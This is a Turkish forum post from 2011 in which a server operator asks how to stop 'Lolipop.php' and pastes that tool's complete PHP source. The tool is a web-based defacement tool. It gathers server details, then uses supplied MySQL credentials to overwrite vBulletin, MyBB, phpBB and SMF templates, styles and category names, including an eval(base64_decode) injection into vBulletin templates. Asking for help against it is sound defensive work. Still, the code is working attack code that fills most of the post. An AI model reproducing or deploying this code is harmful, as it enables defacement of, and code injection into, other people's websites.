
11-06-2011, 15:39:36
|
| |
Lolipop.php Hakkında. - Sunucu Bilgisi Olanlar | | Merhaba Arkadaşlar
Lolipop.php Hakkında bilginize İhtiyacım var şimdi Örneğin sunucuda bulunan bir sitenin ftp ulaşıp o ftp üzerinden sunucudaki bütün php sitelere index basabiliyorlar
Lolipop.php Nasıl Engel olabilirim disable veMod Security fayda etmiyor
Önüne geçemiyoruz yardım ve bilgilerinizi Paylaşırsanız sevınırım
Nasıl engelleyebılırız bunu vbulletın sıtelerın databasine ulaşıyorlar lolipop.php ıle lolipop.php kodları ise şöyledir : Kod: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0045)http://www.hackedpage.by.ru/lolipop_priv8.txt -->
<HTML><HEAD>
<**** http-equiv=Content-Type content="text/html; charset=windows-1251">
<**** content="MSHTML 6.00.2900.5726" name=GENERATOR></HEAD>
<BODY bgColor=#ffffff>
<P align=right></P><?php
######################## Begining of Coding ;) ######################
error_reporting(0);
$info = $_SERVER['SERVER_SOFTWARE'];
$site = getenv("HTTP_HOST");
$page = $_SERVER['SCRIPT_NAME'];
$sname = $_SERVER['SERVER_NAME'];
$uname = php_uname();
$smod = ini_get('safe_mode');
$disfunc = ini_get('disable_functions');
$yourip = $_SERVER['REMOTE_ADDR'];
$serverip = $_SERVER['SERVER_ADDR'];
$version = phpversion();
$ccc = realpath($_GET['chdir'])."/";
$fdel = $_GET['fdel'];
$execute = $_POST['execute'];
$cmd = $_POST['cmd'];
$commander = $_POST['commander'];
$ls = "ls -la";
$source = $_POST['source'];
$gomkf = $_POST['gomkf'];
$title = $_POST['title'];
$sourcego = $_POST['sourcego'];
$ftemp = "tmp";
$temp = tempnam($ftemp, "cx");
$fcopy = $_POST['fcopy'];
$tuser = $_POST['tuser'];
$user = $_POST['user'];
$wdir = $_POST['wdir'];
$tdir = $_POST['tdir'];
$symgo = $_POST['symgo'];
$sym = "xhackers.txt";
$to = $_POST['to'];
$sbjct = $_POST['sbjct'];
$msg = $_POST['msg'];
$header = "From:".$_POST['header'];
//PHPinfo
if(isset($_POST['phpinfo']))
{
die(phpinfo());
}
//Guvenli mod vs vs
if ($smod)
{
$c_h = "<font color=red face='Verdana' size='1'>ON</font>";
}
else
{
$c_h = "<font face='Verdana' size='1' color=green>OFF</font>";
}
//Kapali Fonksiyonlar
if (''==($disfunc))
{
$dis = "<font color=green>None</font>";
}
else
{
$dis = "<font color=red>$disfunc</font>";
}
//Dizin degisimi
if(isset($_GET['dir']) && is_dir($_GET['dir']))
{
chdir($_GET['dir']);
}
$ccc = realpath($_GET['chdir'])."/";
//Baslik
echo "<head>
*********
body { font-size: 12px;
font-family: arial, helvetica;
scrollbar-width: 5;
scrollbar-height: 5;
scrollbar-face-color: black;
scrollbar-shadow-color: silver;
scrollbar-highlight-color: silver;
scrollbar-3dlight-color:silver;
scrollbar-darkshadow-color: silver;
scrollbar-track-color: black;
scrollbar-arrow-color: silver;
}
</style>
<title>Lolipop.php - [$site]</title></head>";
//Ana tablo
echo "<body text='#FFFFFF'>
<table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'>
<tr>
<td><font color='#000000'>
<font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>dumenci</a></strong></font> )</font></font>
</tr>
<tr>
<td style='border: 1px solid #333333'>
<font face='Verdana' size='1' color='#000000'>Site: <u>$site</u><br>Server name: <u>$sname</u><br>Software: <u>$info</u><br>Version : <u>$version</u><br>Uname -a: <u>$uname</u><br>Path: <u>$ccc</u><br>Safemode: <u>$c_h</u><br>Disable Functions: <u>$dis</u><br>Page: <u>$page</u><br>Your IP: <u>$yourip</u><br>Server IP: <u><a href='http://whois.domaintools.com/".$serverip."'>$serverip</A></U></FONT></TD>
</TR></TABLE>"; echo '<TD><FONT
color=#cc0000><STRONG>LoLipop</STRONG></FONT><FONT color=#000000>=]
</EM></FONT></TR>'; //Buton Listesi echo "
<CENTER>
<FORM method=post action??><INPUT type=submit value="VB HACK." name=vbulletin><INPUT type=submit value="MyBB HACK." name=mybulletin><INPUT type=submit value=" phpBB HACK. " name=phpbb><INPUT type=submit value=" SMF HACK. " name=smf></FORM></CENTER>";
//VB HACK if (isset($_POST['vbulletin'])) { echo "
<CENTER>
<TABLE width="100%" border=0>
<TBODY>
<TR>
<TD>
<CENTER><FONT face=Arial color=#000000>==Lolipop VB
index.==</FONT></CENTER>
<CENTER>
<FORM action="" method=post><FONT face=Arial color=#000000>Mysql
Host</FONT><BR><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=50 value=localhost name=dbh><BR><FONT face=Arial
color=#000000>DbKullanici<BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=50 name=dbu><BR><FONT face=Arial color=#000000>Dbadi<BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=50 name=dbn><BR><FONT face=Arial
color=#000000>Dbsifre<BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
type=password size=50 name=dbp><BR><FONT face=Arial color=#000000>?ndexin
Yaz?lacag? B?l?m</FONT><BR><TEXTAREA style="COLOR: #000000; BACKGROUND-COLOR: #ffffff" name=index rows=19 cols=103>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</TEXTAREA><BR><INPUT type=submit value="Kay Gitsin!"></FORM></CENTER></TD></TR></TBODY></TABLE></CENTER>";
die(); } $dumenci="Powered By Lolipop :))"; $dbh = $_POST['dbh']; $dbu =
$_POST['dbu']; $dbn = $_POST['dbn']; $dbp = $_POST['dbp']; $index =
$_POST['index']; $index=str_replace("\'","'",$index); $set_index =
"{\${eval(base64_decode(\'"; $set_index .= base64_encode("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}</TEXTAREA>"; if (!empty($dbh) &&
!empty($dbu) && !empty($dbn) && !empty($index)) {
mysql_connect($dbh,$dbu,$dbp) or die(mysql_error()); mysql_select_db($dbn) or
die(mysql_error()); $loli1 = "UPDATE template SET
template='".$set_index."".$dumenci."' WHERE title='spacer_open'"; $loli2 =
"UPDATE template SET template='".$set_index."".$dumenci."' WHERE
title='FORUMHOME'"; $loli3 = "UPDATE style SET css='".$set_index."".$dumenci."',
stylevars='', csscolors='', editorstyles=''"; $result = mysql_query($loli1) or
die (mysql_error()); $result = mysql_query($loli2) or die (mysql_error());
$result = mysql_query($loli3) or die (mysql_error()); echo "
**********alert('Vb Hacked');</SCRIPT>
"; } //MyBB Hack if (isset($_POST['mybulletin'])) { echo "
<CENTER>
<TABLE width="100%" border=0>
<TBODY>
<TR>
<TD>
<CENTER><FONT face=Arial color=#000000>==Lolipop MyBB
index.==</FONT></CENTER>
<CENTER>
<FORM action="" method=post><FONT face=Arial color=#000000>Mysql
Host</FONT><BR><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=50 value=localhost name=mybbdbh><BR><FONT face=Arial
color=#000000>DbKullanici<BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=50 name=mybbdbu><BR><FONT face=Arial
color=#000000>Dbadi<BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=50 name=mybbdbn><BR><FONT face=Arial
color=#000000>Dbsifre<BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
type=password size=50 name=mybbdbp><BR><FONT face=Arial
color=#000000>?ndexin Yaz?lacag? B?l?m</FONT><BR><TEXTAREA style="COLOR: #000000; BACKGROUND-COLOR: #ffffff" name=mybbindex rows=19 cols=103>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</TEXTAREA><BR><INPUT type=submit value="Kay Gitsin!"></FORM></CENTER></TD></TR></TBODY></TABLE></CENTER>";
die(); } $mybb_dbh = $_POST['mybbdbh']; $mybb_dbu = $_POST['mybbdbu']; $mybb_dbn
= $_POST['mybbdbn']; $mybb_dbp = $_POST['mybbdbp']; $mybb_index =
$_POST['mybbindex']; if (!empty($mybb_dbh) && !empty($mybb_dbu)
&& !empty($mybb_dbn) && !empty($mybb_index)) {
mysql_connect($mybb_dbh,$mybb_dbu,$mybb_dbp) or die(mysql_error());
mysql_select_db($mybb_dbn) or die(mysql_error()); $prefix="mybb_"; $loli7 =
"UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE
title='index'"; $result = mysql_query($loli7) or die (mysql_error()); echo "
**********alert('MyBB Hacked');</SCRIPT>
"; } //PhpBB if (isset($_POST['phpbb'])) { echo "
<CENTER>
<TABLE width="100%" border=0>
<TBODY>
<TR>
<TD>
<CENTER><FONT face=Arial color=#000000>==Lolipop PHPBB
index.==</FONT></CENTER>
<CENTER>
<FORM action="" method=post><FONT face=Arial color=#000000>Mysql
Host</FONT><BR><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=50 value=localhost name=phpbbdbh><BR><FONT face=Arial
color=#000000>DbKullanici<BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=50 name=phpbbdbu><BR><FONT face=Arial
color=#000000>Dbadi<BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=50 name=phpbbdbn><BR><FONT face=Arial
color=#000000>Dbsifre<BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
type=password size=50 name=phpbbdbp><BR><FONT face=Arial
color=#000000>Yazi Veya KOD<BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=100 name=phpbbkat><BR><FONT face=Arial color=#000000>Degisecek
KATEGORI ID si<BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=100
name=katid><BR><INPUT type=submit value="Kay Gitsin!"></FORM></CENTER></TD></TR></TBODY></TABLE></CENTER>";
die(); } $phpbb_dbh = $_POST['phpbbdbh']; $phpbb_dbu = $_POST['phpbbdbu'];
$phpbb_dbn = $_POST['phpbbdbn']; $phpbb_dbp = $_POST['phpbbdbp']; $phpbb_kat =
$_POST['phpbbkat']; $kategoriid=$_POST['katid']; if (!empty($phpbb_dbh)
&& !empty($phpbb_dbu) && !empty($phpbb_dbn) &&
!empty($phpbb_kat)) { mysql_connect($phpbb_dbh,$phpbb_dbu,$phpbb_dbp) or
die(mysql_error()); mysql_select_db($phpbb_dbn) or die(mysql_error()); $loli10 =
"UPDATE phpbb_categories SET cat_title='".$phpbb_kat."' WHERE
cat_id='".$kategoriid."'"; $result = mysql_query($loli10) or die
(mysql_error()); echo "
**********alert('PhpBB Hacked');</SCRIPT>
"; } //SmfHACK if (isset($_POST['smf'])) { echo "
<CENTER>
<TABLE width="100%" border=0>
<TBODY>
<TR>
<TD>
<CENTER><FONT face=Arial color=#000000>==Lolipop SMF
Index.==</FONT></CENTER>
<CENTER>
<FORM action="" method=post><FONT face=Arial color=#000000>Mysql
Host</FONT><BR><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=50 value=localhost name=smfdbh><BR><FONT face=Arial
color=#000000>DbKullanici<BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=50 name=smfdbu><BR><FONT face=Arial
color=#000000>Dbadi<BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=50 name=smfdbn><BR><FONT face=Arial
color=#000000>Dbsifre<BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
type=password size=50 name=smfdbp><BR><FONT face=Arial color=#000000>Yazi
Yada KOD<BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=100 name=smf_index><BR><FONT face=Arial color=#000000>Degisecek
KATEGORI ID si <BR></FONT><INPUT
style="BORDER-RIGHT: #666666 1px solid; BORDER-TOP: #666666 1px solid; FONT-SIZE: 8pt; BORDER-LEFT: #666666 1px solid; COLOR: #000000; BORDER-BOTTOM: #666666 1px solid; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #ffffff"
size=100
name=katid><BR><INPUT type=submit value="Kay Gitsin!"></FORM></CENTER></TD></TR></TBODY></TABLE></CENTER>";
die(); } $smf_dbh = $_POST['smfdbh']; $smf_dbu = $_POST['smfdbu']; $smf_dbn =
$_POST['smfdbn']; $smf_dbp = $_POST['smfdbp']; $smf_index = $_POST['smf_index'];
$smf_katid=$_POST['katid']; if (!empty($smf_dbh) && !empty($smf_dbu)
&& !empty($smf_dbn) && !empty($smf_index)) {
mysql_connect($smf_dbh,$smf_dbu,$smf_dbp) or die(mysql_error());
mysql_select_db($smf_dbn) or die(mysql_error()); $prefix="smf_"; $loli12 =
"UPDATE ".$prefix."categories SET name='".$smf_index."' WHERE
ID_CAT='".$smf_katid."'"; $result = mysql_query($loli12) or die (mysql_error());
echo "
**********alert('smf Hacked');</SCRIPT>
"; } //Alt taraf echo " <BR>
<TABLE id=table1 style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0
borderColorDark=#666666 cellPadding=5 width="100%" border=1>
<TBODY>
<TR>
<TD style="FONT-SIZE: 11px; COLOR: #000000; FONT-FAMILY: verdana" vAlign=top
width="25%" height=1>
<P><STRONG>Lolipop.php</STRONG> Forum Edition. 27 Kasim 2008 Persembe
<STRONG>21:45 </STRONG>de kodlanip tamamlanmistir.I?eriginin
degistirilmesi sonraki versiyonlarin olusmasina engel olacaktir. </P>
<P><STRONG>Coded By dumenci | IMHATIMI.ORG ==> IMTSOFT </STRONG></P>
<P><STRONG>BugBUSTERS Team :
N?tRoot,MecTruy</STRONG><BR></P></TD></TR></TBODY></TABLE>"; // Kod bitisi
?></BODY></HTML></CODE> |